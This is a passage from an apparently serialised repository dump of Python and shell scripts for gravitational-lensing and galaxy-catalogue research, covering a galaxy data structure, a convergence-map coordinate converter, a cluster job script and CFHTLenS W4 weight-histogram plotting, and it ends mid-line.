('stellar_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , total mass in stars in the disk and the bulge together.\n ('bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the bulge.\n ('disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the disk.\n ('hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas.\n ('ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('black_hole_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of the central black hole\n ('ICM' ,'f4' ), #0.0 $ , (?)\n ('metals_cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in cold gas\n ('metals_bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in bulge\n ('metals_disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in disk\n ('metals_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas\n ('metals_ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('metals_ICM' ,'f4' ), #0.0 $ , (?)\n ('primordial_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Accretion rate of primordial gas.\n ('cooling_rate' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate\n ('cooling_rate_before_AGN' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate if there was no AGN feedback.\n ('sfr' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate\n ('sfr_bulge' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate in bulge.\n ('x_ray_lum' ,'f4' ), #0.0 $ , [log10(erg/sec)] , Log10 of X-Ray luminosity in erg/sec\n ('bulge_size' ,'f4' ), #0.0 $ , [Mpc/h] , Half mass radius of bulge\n ('stellar_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the stellar disk, 3x the scale length.\n ('gas_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the gas disk (?)\n ('cos_inclination' ,'f4' ), #0.0 $ , (?)\n ('disrupt_on' ,'i4' ), #0L $ , , 0: galaxy merged onto merger center; 1: galaxy was disrupted before merging onto its descendant, matter went into ICM of merger center\n ('merge_on' ,'i4' ), #0L $ , , 0: merger clock not set yet;\n ('cooling_radius' ,'f4' ), #0.0 $ , [Mpc/h] , the radius within which the cooling time scale is shorter than the dynamical timescale\n ('quasar_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which cold gas is accreted into the central black hole in the quasar mode.\n ('radio_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which hot gas is accreted into the central black hole in the radio mode.\n ('mag' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction not included ?)\n ('mag_bulge' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy bulge (magnification included, dust extinction not included ???)\n ('mag_dust' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction included ?)\n ('mass_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('rband_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('sfh_ibin' ,'i4' ), #0L $ , , Index of the higest star formation history bin currently in use.\n ('sfh_numbins' ,'i4' ), #0L $ , , Number of non-empty star formation history bins.\n ('distortion' ,'f4',(2,2)), #fltarr(4) $ , , (11, 12, 21, 22)-components of distortion matrix\n ('plane_number' ,'i4' ) #0L $ , , index of redshift slice (and lens plane) the galaxy is associated with\n ])\n\n filter_number_for_c_johnson_U = 0\n filter_number_for_c_johnson_B = 1\n filter_number_for_c_johnson_V = 2\n filter_number_for_c_johnson_rc = 3\n filter_number_for_c_johnson_ic = 4\n filter_number_for_vista_johnson_Z = 5\n filter_number_for_vista_johnson_Y = 6\n filter_number_for_vista_johnson_J = 7\n filter_number_for_vista_johnson_H = 8\n filter_number_for_c_johnson_K = 9\n filter_number_for_vista_johnson_ks = 10\n filter_number_for_i1_band = 11\n filter_number_for_i2_band = 12\n filter_number_for_i3_band = 13\n filter_number_for_i4_band = 14\n filter_number_for_u_band_trans = 15\n filter_number_for_g_band_trans = 16\n filter_number_for_r_band_trans = 17\n filter_number_for_i_band_trans = 18\n filter_number_for_z_band_trans = 19\n filter_number_for_ACS_WFC_F435W = 20\n filter_number_for_ACS_WFC_F475W = 21\n filter_number_for_ACS_WFC_F606W = 22\n filter_number_for_ACS_WFC_F625W = 23\n filter_number_for_ACS_WFC_F775W = 24\n filter_number_for_ACS_WFC_F814W = 25\n filter_number_for_ACS_WFC_F850_LP = 26\n filter_number_for_GALEX_FUV = 27\n filter_number_for_GALEX_NUV = 28\n filter_number_for_NIC_F110W = 29\n filter_number_for_NIC_F160W3 = 30\n filter_number_for_VIMOS_U = 31\n filter_number_for_WFC3_IR_F105W = 32\n filter_number_for_WFC3_IR_F125W = 33\n filter_number_for_WFC3_IR_F160W = 34\n filter_number_for_WFC3_UVIS_F225W = 35\n filter_number_for_WFC3_UVIS_F275W = 36\n filter_number_for_WFC3_UVIS_F336W = 37\n filter_number_for_WFPC2_F300W = 38\n filter_number_for_WFPC2_F450W = 39\n\n# with open(\"/lfs08/rusucs/0408/GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane_1_f.images\", mode = 'rb') as file:\n# lower_bound = np.fromfile(file, 'f8', 2)\n# upper_bound = np.fromfile(file, 'f8', 2)\n# plane_angle, = np.fromfile(file, 'f8', 1)\n# redshift, = np.fromfile(file, 'f8', 1)\n# n_galaxies, = np.fromfile(file, 'i8', 1)\n# n_cells = np.fromfile(file, 'i4', 2)\n# galaxy = np.fromfile(file, galaxy_struct, n_galaxies)\n# xi = galaxy['mag'][:,filter_number_for_i_band_trans]\n# x0 = galaxy['redshift']\n# x = np.c_[x0,xi]\n" }, { "alpha_fraction": 0.6773049831390381, "alphanum_fraction": 0.7056737542152405, "avg_line_length": 20.69230842590332, "blob_id": "f486a2eedae766ad2bc3c608d06aaf81d228dac7", "content_id": "8f947e9da6fad15de4bb09216f8047633cc466dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 282, "license_type": "no_license", "max_line_length": 75, "num_lines": 13, "path": "/python/modeling_utilities/func.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# outputs the result of a function to stdout\n# I use it as the first step to learning how to combine C++ and python code\n# run as python func.py 0.1 0.1\n\nimport sys\nimport os\nfrom os import system\nimport numpy as np\n\nx = float(sys.argv[1])\ny = float(sys.argv[2])\n\nprint x**2 + y**2\n" }, { "alpha_fraction": 0.4670391082763672, "alphanum_fraction": 0.5273743271827698, "avg_line_length": 28.83333396911621, "blob_id": "33e49f611ca7e58cf94261c156b8c04266524213", "content_id": "2430ba733ce3d95be6bb73134fcbe8e9b8b12f3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 895, "license_type": "no_license", "max_line_length": 134, "num_lines": 30, "path": "/python/kappacoord.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# run as: python kappacoord.py /Volumes/G-RAIDStudio/simulations/lensing_simulations/GGL_los_8_7_6_N_4096_ang_4_rays_to_plane_37_f.dat\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\ndegree=np.pi/180\nL_field=4.0*degree\nN_pix_per_dim = 4096\nL_pix = L_field / N_pix_per_dim\n\ni=0\nos.system(\"rm %s_pos.lst\" % str(sys.argv[1])[0:len(str(sys.argv[1]))-4])\nwith open(str(sys.argv[1])) as f:\n for line in f:\n if (line!=\"\\n\"):\n if i%1000==0:\n print i\n kappa=float(line.split()[1])\n x=1+i/4096\n y=1+i%4096\n posx = -0.5 * L_field + (x + 0.5) * L_pix\n posy = -0.5 * L_field + (y + 0.5) * L_pix\n g=open('%s_pos.lst' %str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n g.write('%s %s %s %s %s \\n' % (posx, posy, x, y, kappa))\n g.close\n i=i+1\n\nprint \"Done!\"\n" }, { "alpha_fraction": 0.6245847344398499, "alphanum_fraction": 0.7408638000488281, "avg_line_length": 42, "blob_id": "b553369e886f1ec4fdd73616682db4b339bc4e10", "content_id": "c815b5d71597c70ebd43c314a591aaa445f852e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 301, "license_type": "no_license", "max_line_length": 121, "num_lines": 7, "path": "/python/scripts/UCLA/script.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": ". /u/local/Modules/default/init/modules.sh\nmodule load python/2.7.13_shared\ncd /u/flashscratch/c/cerusu\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5 -1.0 -1.0\n\n# run as qsub -l h_data=6G,h_rt=336:00:00,highp -m abe -N test script.sh\n" }, { "alpha_fraction": 0.5598971247673035, "alphanum_fraction": 0.6552122831344604, "avg_line_length": 52.97972106933594, "blob_id": "846e479497a68985f003514257751dc97612400f", "content_id": "97ab5e5bd42b9eac1ae9987f0a2619af1cc8fcc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34601, "license_type": "no_license", "max_line_length": 315, "num_lines": 641, "path": "/python/weightinghistogramsuniversalW4.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# usage: use one of the following arguments: lens name, followed by orig or samp, followed by number of bins, followed by radius (45,60,90 or 120) and by maglimit\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n#import scipy\n#from scipy import special\n#from astropy.io import fits\n#from astropy.wcs import WCS\n#from astropy import units as u\n#from astropy.coordinates import SkyCoord\n#from astropy.io import ascii\n#from astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\n#from numpy.random import normal\nfrom scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nprint(\"Arguments: \\n Lens field: %s \\n Original values or samples drawn from P(z) and P(Mstar): %s \\n Number of bins: %s \\n Radius of each cell: %s \\n Limiting i-band magnitude: %s \\n Classification: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5]), str(sys.argv[6])))\n\nif (str(sys.argv[2]) == \"samp\") or (str(sys.argv[2]) == \"tab\"):\n print \"This process is both processor and memory intensive and will take a couple of hours for a sampling of 1000...\"\n start_time = time.time()\n\nwith open('fieldsforhist50try_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\ncols=1\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.suptitle(r'HE0435 weight histogram test W1-W4', fontsize=10, y=0.998)\n\n\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\n\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nx = linspace(0,2,500)\n\nplt.subplot(451)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(451)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 1\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=3\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,2,500)\n\n\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\n\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(452)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(452)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{1}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 2\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=5\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(453)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(453)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{z}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 3\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=7\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(454)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(454)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 4\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=9\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(456)\nrangemax=7\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(456)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 5\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=11\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(457)\nrangemax=6\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(457)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 6\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=13\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(458)\nrangemax=6\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(458)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 7\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=15\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 